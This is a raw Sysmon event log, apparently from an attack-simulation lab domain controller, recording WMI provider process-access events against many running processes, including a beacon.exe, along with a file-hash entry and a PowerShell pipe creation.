16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240331Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240330Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240329Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240328Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0951A77C255E400A2B0B84337DE24269,SHA256=E8EBFDE4EFAF9734CF1AE87D5BB3479AFA133384123E213B63DD6515123AC362,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240327Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240326Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240325Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.326{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240324Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240323Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240322Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240321Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240320Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240319Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002240318Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:03.310{05ADC7E1-6DAB-603E-B7AA-00000000AD01}9900\PSHost.132591776431676512.9900.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002240317Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240316Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240315Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240314Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240313Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240312Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.310{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240311Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 